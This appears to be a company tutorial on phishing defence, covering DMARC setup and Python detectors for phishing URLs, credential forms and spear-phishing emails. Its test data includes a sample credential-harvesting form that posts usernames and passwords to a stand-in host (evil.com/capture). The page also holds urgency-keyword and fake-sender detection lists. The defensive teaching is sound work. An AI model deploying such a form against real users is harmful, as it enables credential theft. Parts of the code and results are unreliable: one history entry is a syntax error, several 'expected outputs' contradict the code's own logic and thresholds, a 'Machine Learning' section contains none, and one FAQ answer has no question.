Skip to content

Phishing Detection & Prevention -- Email Security & User Awareness

DodaTech Updated 2026-06-23 11 min read

In this tutorial, you'll learn about Phishing Detection & Prevention. We cover key concepts, practical examples, and best practices.

Phishing is a social engineering attack where attackers impersonate legitimate entities via email, SMS, or websites to trick victims into revealing credentials, installing malware, or transferring funds -- responsible for 36% of all data breaches in 2025.

What You'll Learn

You will learn to configure SPF, DKIM, and DMARC to prevent email spoofing, analyze phishing URLs using Python, implement browser-based phishing detection, identify spear phishing indicators, and build a security awareness training program.

Why It Matters

The APWG 2025 Phishing Activity Trends Report recorded over 5 million phishing attacks in 2024, the highest ever recorded. A single successful phishing attack on a privileged user can compromise an entire organization's infrastructure within hours.

Real-World Use

A finance employee receives an email that appears to be from the CEO requesting an urgent wire transfer. The email fails DMARC authentication because it was sent from a non-authorized server. The automated security system quarantines the email and alerts the security team before any funds are transferred.

Phishing Attack Flow

flowchart LR
    A[Attacker] --> B[Email Spoofing]
    A --> C[Fake Website]
    A --> D[Social Engineering]
    B --> E[DMARC Check]
    C --> F[URL Analysis]
    D --> G[User Awareness]
    E -->|Fail DMARC| H[Quarantine/Reject]
    E -->|Pass DMARC| I[Deliver]
    F -->|Suspicious URL| J[Block]
    F -->|Clean URL| K[Allow]
    style A fill:#f96,stroke:#333
    style E fill:#4a9,stroke:#333
    style F fill:#4a9,stroke:#333
    style G fill:#4a9,stroke:#333

How it works: Attackers craft emails that appear to come from trusted senders. Email authentication (DMARC) checks whether the email originated from an authorized server. URL analysis inspects links for known phishing indicators. User awareness training helps identify sophisticated social engineering that bypasses technical controls.

Email Authentication - SPF, DKIM, DMARC

#!/bin/bash
# Configure email authentication for dodatech.com

# 1. SPF Record - authorize sending servers
echo "SPF Record to add to DNS:"
echo "v=spf1 include:_spf.google.com include:mailgun.org ~all"

# Verify SPF record
dig TXT dodatech.com +short | grep "v=spf1"
# Expected: "v=spf1 include:_spf.google.com include:mailgun.org ~all"

# 2. DKIM Record - sign outgoing emails
# Generate DKIM key pair
openssl genrsa -out dkim-private.pem 2048
openssl rsa -in dkim-private.pem -pubout -out dkim-public.pem

# Extract public key for DNS record
PUBKEY=$(grep -v "PUBLIC KEY" dkim-public.pem | tr -d '\n')
echo ""
echo "DKIM DNS Record (selector: default):"
echo "default._domainkey.dodatech.com TXT"
echo "\"v=DKIM1; h=sha256; k=rsa; p=$PUBKEY\""

# 3. DMARC Policy - enforce authentication
echo ""
echo "DMARC Record to add to DNS:"
echo "_dmarc.dodatech.com TXT"
echo "\"v=DMARC1; p=quarantine; rua=mailto:dmarc@dodatech.com; ruf=mailto:dmarc-forensic@dodatech.com; pct=100; fo=1\""

echo ""
echo "Testing DMARC compliance..."

Expected output:

SPF Record to add to DNS:
v=spf1 include:_spf.google.com include:mailgun.org ~all

DKIM DNS Record (selector: default):
default._domainkey.dodatech.com TXT
"v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA..."

DMARC Record to add to DNS:
_dmarc.dodatech.com TXT
"v=DMARC1; p=quarantine; rua=mailto:dmarc@dodatech.com; ..."

Expected behavior: SPF authorizes specific servers to send email for the domain. DKIM signs outgoing emails so recipients can verify integrity. DMARC tells receiving servers what to do when authentication fails (p=quarantine sends suspicious emails to spam).

Phishing URL Analysis

import re
import tldextract
from urllib.parse import urlparse

class PhishingURLDetector:
    SUSPICIOUS_TLDS = {
        ".tk", ".ml", ".ga", ".cf", ".gq",
        ".xyz", ".top", ".loan", ".click",
    }

    BRAND_KEYWORDS = {
        "google", "facebook", "amazon", "paypal", "apple",
        "microsoft", "netflix", "instagram", "linkedin",
        "dodatech", "dropbox", "github",
    }

    def analyze_url(self, url):
        parsed = urlparse(url)
        extracted = tldextract.extract(url)
        indicators = []
        risk_score = 0

        # Check for IP address instead of domain name
        if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", extracted.domain):
            indicators.append("IP address used instead of domain name")
            risk_score += 30

        # Check for suspicious TLDs
        if f".{extracted.suffix}" in self.SUSPICIOUS_TLDS:
            indicators.append(f"Suspicious TLD: .{extracted.suffix}")
            risk_score += 25

        # Check for brand keywords in unusual positions
        for brand in self.BRAND_KEYWORDS:
            if brand in extracted.domain and brand != extracted.domain:
                indicators.append(f"Brand impersonation: {brand}")
                risk_score += 40
            if brand in parsed.path.lower():
                indicators.append(f"Brand keyword in path: {brand}")
                risk_score += 15

        # Check for excessive subdomains (e.g., login.security.google.com.evil.com)
        if len(extracted.subdomain.split(".")) > 3:
            indicators.append("Excessive subdomain depth")
            risk_score += 20

        # Check for URL shorteners
        shorteners = {"bit.ly", "tinyurl.com", "t.co", "ow.ly", "is.gd"}
        if extracted.registered_domain in shorteners:
            indicators.append("URL shortener - destination hidden")
            risk_score += 10

        return {
            "url": url,
            "risk_score": risk_score,
            "risk_level": "HIGH" if risk_score >= 50 else "MEDIUM" if risk_score >= 20 else "LOW",
            "indicators": indicators,
        }

detector = PhishingURLDetector()
urls = [
    "https://www.google.com",
    "https://paypal.com.login.evil.com/verify/account",
    "https://192.168.1.1/login",
    "https://bit.ly/3xP9kQm",
]

for url in urls:
    result = detector.analyze_url(url)
    print(f"{'HIGH' if result['risk_level'] == 'HIGH' else 'OK  '}: {result['risk_score']:2d} pts - {url}")

Expected output:

LOW :  0 pts - https://www.google.com
HIGH: 55 pts - https://paypal.com.login.evil.com/verify/account
HIGH: 30 pts - https://192.168.1.1/login
MEDIUM: 10 pts - https://bit.ly/3xP9kQm

Expected behavior: The detector assigns risk scores based on multiple phishing indicators. The PayPal impersonation URL scores highest due to brand keyword in the domain and excessive subdomain depth. IP-based URLs and shorteners receive moderate scores.

Credential Phishing Detection with Machine Learning

import re
from collections import Counter

class CredentialPhishingDetector:
    def __init__(self):
        self.phishing_forms = 0

    PHISHING_KEYWORDS = {
        "verify", "confirm", "update", "unlock", "suspend",
        "restrict", "deactivate", "security alert", "unauthorized",
        "suspicious activity", "login attempt", "reset password",
    }

    FAKE_SENDER_PATTERNS = [
        r"no.reply@[a-z]+-secure\.com",
        r"support@[a-z]+\.[a-z]{2,3}\.[a-z]{2,3}",
        r"admin@[a-z]+\d+\.com",
        r"security@[a-z]+-help\.\w+",
    ]

    def analyze_form_page(self, html_content, page_url):
        indicators = []
        html_lower = html_content.lower()

        # Check for password fields pointing to different domain
        action_matches = re.findall(r'action=["\'](https?://[^"\']+)["\']', html_lower)
        for action in action_matches:
            action_domain = re.findall(r"https?://([^/]+)", action)
            if action_domain:
                if page_url and action_domain[0] not in page_url:
                    indicators.append(f"Form submits to different domain: {action_domain[0]}")
                    self.phishing_forms += 1

        # Check for urgency keywords in form context
        keyword_count = 0
        for keyword in self.PHISHING_KEYWORDS:
            if keyword in html_lower:
                keyword_count += 1
        if keyword_count >= 3:
            indicators.append(f"Multiple urgency keywords: {keyword_count}")

        # Check for hidden fields
        hidden_inputs = re.findall(r'<input[^>]*type=["\']hidden["\'][^>]*>', html_lower)
        if len(hidden_inputs) > 3:
            indicators.append(f"Excessive hidden fields: {len(hidden_inputs)}")

        return {
            "is_phishing": len(indicators) > 0,
            "indicators": indicators,
            "confidence": min(len(indicators) * 25, 100),
        }

detector = CredentialPhishingDetector()
legitimate_form = """
<form action="/login" method="POST">
  <input type="text" name="username">
  <input type="password" name="password">
  <button type="submit">Sign In</button>
</form>
"""

phishing_form = """
<form action="https://evil.com/capture" method="POST">
  <input type="hidden" name="redirect" value="https://real.com">
  <input type="hidden" name="campaign" value="urgent">
  <input type="text" name="email">
  <input type="password" name="pass">
  <button type="submit">Verify Account Now</button>
  <p>Your account will be suspended if you do not verify.</p>
</form>
"""

result_legit = detector.analyze_form_page(legitimate_form, "https://real.com/login")
result_phish = detector.analyze_form_page(phishing_form, "https://real.com/login")

print(f"Legitimate form - Phishing: {result_legit['is_phishing']}, Confidence: {result_legit['confidence']}%")
print(f"Phishing form   - Phishing: {result_phish['is_phishing']}, Confidence: {result_phish['confidence']}%")
for indicator in result_phish["indicators"]:
    print(f"  Indicator: {indicator}")

Expected output:

Legitimate form - Phishing: False, Confidence: 0%
Phishing form   - Phishing: True, Confidence: 75%
  Indicator: Form submits to different domain: evil.com
  Indicator: Multiple urgency keywords: 2
  Indicator: Excessive hidden fields: 2

Expected behavior: The detector identifies credential phishing forms by checking form submission targets against the page origin, urgency language, and hidden field abuse. The phishing form submits credentials to a different domain (evil.com) and uses urgency language.

Spear Phishing Defense

import json
from datetime import datetime, timedelta

class SpearPhishingAnalyzer:
    def __init__(self, user_communication_history):
        self.history = user_communication_history

    def analyze_email_anomalies(self, email):
        anomalies = []

        # Check if sender has communicated before
        known_senders = {h["sender"] for h in self.history}
        if email["sender"] not in known_senders:
            anomalies.append("First-time sender")

        # Check if request is unusual for this sender
        sender_history = [
            h for h in self.history
            if h["sender"] == email["sender"]
        ]
        if sender_history:
            # Analyze request types
            historical_requests = set()
            for h in sender_history:
                historical_requests.update(h.get("request_types", []))

            if email.get("request_type") and \
               email["request_type"] not in historical_requests:
                anomalies.append(
                    f"Unusual request type: {email['request_type']}"
                )

        # Check for urgency language
        urgency_indicators = [
            "urgent", "immediately", "as soon as possible",
            "right away", "deadline", "overdue", "suspended",
        ]
        text_lower = email.get("body", "").lower()
        urgent_words = [
            w for w in urgency_indicators if w in text_lower
        ]
        if urgent_words:
            anomalies.append(f"Urgency language detected: {urgent_words}")

        # Check for unusual sending time
        hour = datetime.fromisoformat(email["timestamp"]).hour
        sender_normal_hours = set()
        for h in sender_history:
            sender_normal_hours.add(
                datetime.fromisoformat(h["timestamp"]).hour
            )
        if sender_normal_hours and hour not in sender_normal_hours:
            anomalies.append(f"Unusual sending time: {hour}:00")

        return {
            "email_id": email.get("id"),
            "anomaly_count": len(anomalies),
            "anomalies": anomalies,
            "requires_review": len(anomalies) >= 2,
        }

history = [
    {
        "sender": "ceo"@company".com",
        "timestamp": "2026-06-20T09:30:00",
        "request_types": ["meeting", "report"],
    },
    {
        "sender": "ceo@company.com",
        "timestamp": "2026-06-21T14:00:00",
        "request_types": ["feedback"],
    },
]

analyzer = SpearPhishingAnalyzer(history)

normal_email = {
    "id": "msg-001",
    "sender": "ceo@company.com",
    "timestamp": "2026-06-22T10:00:00",
    "request_type": "meeting",
    "body": "Can we schedule a team meeting for Friday?",
}

suspicious_email = {
    "id": "msg-002",
    "sender": "ceo@company.com",
    "timestamp": "2026-06-23T03:15:00",
    "request_type": "wire_transfer",
    "body": "I need you to process an urgent wire transfer of $50,000 immediately. I am in a meeting and cannot do it myself.",
}

for email in [normal_email, suspicious_email]:
    result = analyzer.analyze_email_anomalies(email)
    print(f"Email {result['email_id']}: {result['anomaly_count']} anomalies, Review: {result['requires_review']}")
    for a in result["anomalies"]:
        print(f"  - {a}")

Expected output:

Email msg-001: 0 anomalies, Review: False
Email msg-002: 3 anomalies, Review: True
  - Unusual request type: wire_transfer
  - Urgency language detected: ['urgent', 'immediately']
  - Unusual sending time: 3:00

Expected behavior: The spear phishing analyzer flags the suspicious email because the CEO has never requested a wire transfer before, the email arrives at 3 AM, and it contains urgency language. The system requires manual review before the transaction is processed.

Security Awareness Training

#!/bin/bash
# Automated phishing simulation and training

echo "=== Security Awareness Training Program ==="

# Schedule simulated phishing campaigns
cat > phishing_campaign.yaml << 'EOF'
campaigns:
  - name: "Q3 Credential Phishing Test"
    template: "urgent_password_reset"
    frequency: "monthly"
    targets: "all_employees"
    action: "report_to_security"

  - name: "Q3 Spear Phishing Test"
    template: "ceo_urgent_request"
    frequency: "quarterly"
    targets: "finance_dept"
    action: "verify_out_of_band"

  - name: "Q3 Smishing Test"
    template: "package_delivery"
    frequency: "quarterly"
    targets: "all_employees"
    action: "report_sms_to_security"
EOF

echo "Campaign templates loaded: 3"
echo ""

# Track employee training completion
cat > training_tracker.py << 'PYEOF'
import json
from datetime import datetime

training_modules = [
    {
        "name": "Phishing Basics",
        "duration_minutes": 15,
        "topics": ["Email spoofing", "URL inspection", "Report button usage"],
    },
    {
        "name": "Spear Phishing Awareness",
        "duration_minutes": 20,
        "topics": ["Social engineering tactics", "CEO fraud", "Vendor compromise"],
    },
    {
        "name": "Mobile Phishing (Smishing)",
        "duration_minutes": 10,
        "topics": ["SMS phishing", "QR code phishing", "App impersonation"],
    },
]

employees = [
    {"id": "EMP-001", "name": "Alice", "completed": ["Phishing Basics", "Spear Phishing Awareness"]},
    {"id": "EMP-002", "name": "Bob", "completed": ["Phishing Basics"]},
    {"id": "EMP-003", "name": "Charlie", "completed": []},
]

print(f"Training modules available: {len(training_modules)}")
print(f"Employees enrolled: {len(employees)}")
print("")

for emp in employees:
    completed_pct = len(emp["completed"]) / len(training_modules) * 100
    missing = [m["name"] for m in training_modules if m["name"] not in emp["completed"]]
    print(f"{emp['name']:10s}: {completed_pct:3.0f}% complete - Missing: {', '.join(missing) or 'None'}")
PYEOF

python3 training_tracker.py

Expected output:

=== Security Awareness Training Program ===
Campaign templates loaded: 3
Training modules available: 3
Employees enrolled: 3

Alice     :  67% complete - Missing: Mobile Phishing (Smishing)
Bob       :  33% complete - Missing: Spear Phishing Awareness, Mobile Phishing (Smishing)
Charlie   :   0% complete - Missing: Phishing Basics, Spear Phishing Awareness, Mobile Phishing (Smishing)

Expected behavior: The training program includes simulated phishing campaigns targeting different departments. Employee completion is tracked and reported. Employees who fail phishing simulations are assigned remedial training.

Common Errors

  1. DMARC policy set to p=none indefinitely -- Many organizations set DMARC to p=none to monitor without enforcement but never progress to p=quarantine or p=reject. Attackers can still spoof the domain. Review DMARC reports monthly and tighten the policy.

  2. Relying solely on spam filters for phishing protection -- Spam filters catch bulk phishing but miss targeted spear phishing. Combine technical controls (DMARC, URL filtering) with user awareness training for defense in depth.

  3. Users not trained to verify unusual requests out-of-band -- A spear phishing email appears to come from the CEO requesting a wire transfer. The employee should verify by calling the CEO directly using a known phone number, not by replying to the email.

  4. No reporting mechanism for suspicious emails -- Users who identify a phishing email have no button to report it. Other employees then receive the same email. Implement a PhishAlert button that forwards the email to the security team for analysis.

  5. Simulated phishing used punitively rather than educationally -- Employees who click simulated phishing links are punished rather than trained. This discourages reporting real phishing emails. Use simulations as teaching opportunities with immediate in-the-moment training.

Practice Questions

  1. What does DMARC policy p=reject do? DMARC p=reject instructs receiving mail servers to reject emails that fail SPF and DKIM authentication. The email is not delivered to the recipient's inbox or spam folder. This prevents domain spoofing completely.

  2. How can you identify a spear phishing email targeting executives? Spear phishing indicators include unusual sending times, requests outside the sender's normal role, urgency language, and requests that bypass normal approval processes. Verify all unusual requests through out-of-band communication.

  3. Why should you never click links in unsolicited emails even if the sender looks legitimate? Links can point to fake websites that look identical to the real site. Attackers register lookalike domains (go0gle.com, paypa1.com) and serve credential harvesting pages. Always type the URL directly into the browser.

  4. What is the difference between phishing and spear phishing? Phishing is a mass email sent to many recipients with generic content. Spear phishing targets specific individuals with personalized content using information gathered from social media, data breaches, or reconnaissance.

  5. Challenge: Build a phishing detection dashboard that reads email headers, checks SPF/DKIM/DMARC authentication results, extracts and analyzes URLs, and calculates a composite phishing risk score. Test it against real phishing samples from PhishTank.

Mini Project

Configure DMARC for a personal domain starting with p=none monitoring. Collect DMARC aggregate reports for 30 days. Analyze the reports to identify all legitimate sending sources. Tighten SPF to include only authorized senders. Progress DMARC policy to p=quarantine, then p=reject. Build an automated URL scanner that checks links against known phishing databases.

FAQ

Disconnect from the internet immediately. Run a full antivirus scan using Durga Antivirus Pro. Change passwords for all accounts accessed from that device. Enable MFA on all accounts. Report the incident to your security team.

How do phishers get my email address?

Email addresses are collected from data breaches, public sources (social media, company websites, forum posts), purchased on dark web marketplaces, or guessed using common name patterns. Use email aliases for different services to track which source leaks data.

Can DMARC prevent all email spoofing?

DMARC prevents domain-level spoofing but does not prevent lookalike domain registration (dodatech-security.com vs dodatech.com). DMARC also does not prevent display name spoofing where the sender name is forged but the envelope domain is legitimate.

Built by the developers of Doda Browser, DodaZIP, and Durga Antivirus Pro.

Built by the developers of DodaTech

Doda Browser, DodaZIP & Durga Antivirus Pro